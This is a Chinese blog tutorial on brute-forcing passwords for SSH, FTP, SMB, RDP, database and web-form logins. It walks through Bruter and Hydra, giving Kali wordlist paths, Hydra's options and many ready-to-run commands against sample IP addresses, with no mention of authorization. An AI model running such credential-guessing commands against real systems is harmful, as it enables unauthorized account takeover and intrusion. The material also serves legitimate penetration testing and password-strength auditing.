暴力破解與驗證碼安全之——CS架暴力猜解

CS架暴力猜解

指軟件,數據庫,操作系統,3389相關的破解。C/S 即客戶端/服務器,基於 C/S 架構的應用程序 如 ssh ftp
sql-server mysql 等,這些服務往往提供一個高權限的用戶,而這個高權限的用戶往往可以進行執行命令的操作,如sql-server 的 sa ,mysql 的 root,oracle 的 sys 和 system帳號,使用這些高權限的用戶能在很大程度上給開發人員帶來方便,但如果口令被破解帶來的危害也是相當大的。C/S 架構主要使用的破解工具 Hydra、Bruter、X-scan

window下建議使用bruter

添加地址,選擇協議(目標Linux選SSH2,windows用SMB,數據庫MYSQL,郵箱POP3),端口(小技巧:Linux默認22,不知道就利用nmap掃一下,telnet+Ip+端口,看一下哪個用的是SSH2

linux默認用戶名一般是root,windows是administrator
選擇字典(注意不支持中文目錄)
開始
也可以用自帶功能
設置密碼長度

Linux下建議使用hydra

kali自帶
也可以自己下載安裝
注意hydra-gtk是圖形化界面的
hydra 是著名黑客組織 thc 的一款開源的暴力密碼破解工具,可以在線破解多種密碼。官網:http://www.thc.org/thc-hydra

kail 密碼字典

/usr/share/wfuzz/wordlist/others/names.txt
/usr/share/wfuzz/wordlist/others/common_pass.txt
在該界面指定用戶名和密碼列表文件,這裏使用 Kali 系統中存在的用戶名和
密碼列表文件,並選擇 Loop around users 選項。其中,用戶名和密碼文件
分別保存在/usr/share/wfuzz/wordlist/others/names.txt 和
/usr/share/wfuzz/wordlist/others/common_pass.txt 中

參數

		hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
		-R 繼續從上一次進度接着破解。
		-S 採用 SSL 鏈接。
		-s PORT 可通過這個參數指定非默認端口。
		-l LOGIN 指定破解的用戶名,對特定用戶破解。
		-L FILE 指定用戶名字典。
		-p PASS 小寫,指定密碼破解,少用,一般是採用密碼字典。
		-P FILE 大寫,指定密碼字典。
		-e ns 可選選項,n:空密碼試探,s:使用指定用戶和密碼試探。
			一般都是加上的
		-C FILE 使用冒號分割格式,例如“登錄名:密碼”來代替-L/-P 參數。
		-M FILE 指定目標列表文件一行一條。
		-o FILE 指定結果輸出文件。
		-f 在使用-M 參數以後,找到第一對登錄名或者密碼的時候中止破解。
		-t TASKS 同時運行的線程數,默認爲 16。 -w TIME 設置最大超時的時間,單位秒,默認是 30s。 -v / -V 顯示詳細過程。
		server 目標 ip
		service 指定服務名,支持的服務和協議:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt 
			http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 l
		dap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp 
		rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd fi
		rebird ncp afp 等等。
		OPT 可選項

使用舉例

		1.手動創建用戶名字典和密碼字典,需要利用密碼字典生成器生成強大的字典
		2.破解 ssh:

#hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.8 ssh
破解成功,直接顯示結果。也可以使用 -o 選項指定結果輸出文件。

#hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

		1.破解 ssh:
			# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh
				# hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh
		2.破解 ftp:
			# hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認 16) -vV
				# hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
		3.get 方式提交,破解 web 登錄:
			# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
				# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php
		4.post 方式提交,破解 web 登錄:
			# hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username =^USER^&password=^PASS^&submit=login:sorry password"
				# hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "log in.php:id=^USER^&passwd=^PASS^:wrong username or password"
					(參數說明:-t 同時線程數 3,-l 用戶名是 admin,字典 pass.txt,保存爲 out.txt,-f 當破解了一個密碼就停止, 10.36.16.18 目標 ip,http-post-form 表示破解是採用 http 的 post 方式提交的表單密碼破解,<title>中的內容是表示錯誤猜解的返回信息提示。)
		5.破解 https:
			# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
		6.破解 teamspeak:
			# hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak
		7.破解 cisco:
			# hydra -P pass.txt 10.36.16.18 cisco
				# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
		8.破解 smb:
			# hydra -l administrator -P pass.txt 10.36.16.18 smb
		9.破解 pop3:
			# hydra -l muts -P pass.txt my.pop3.mail pop3
		10.破解 rdp:
			# hydra ip rdp -l administrator -P pass.txt -V
		11.破解 http-proxy:
			# hydra -l admin -P pass.txt http-proxy://10.36.16.18
		12.破解 imap:
			# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

關於hydra-gtk的使用

		圖形化界面界面比較簡單,直接填寫IP,設置字典,設置協議等
			就可以開始了

補充

對於爆破軟件的選擇,主要看速度,穩定性,支持的協議數
這款暴力密碼破解工具相當強大,支持幾乎所有協議的在線密碼破解,
其密碼能否被破解關鍵在於字典是否足夠強大。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章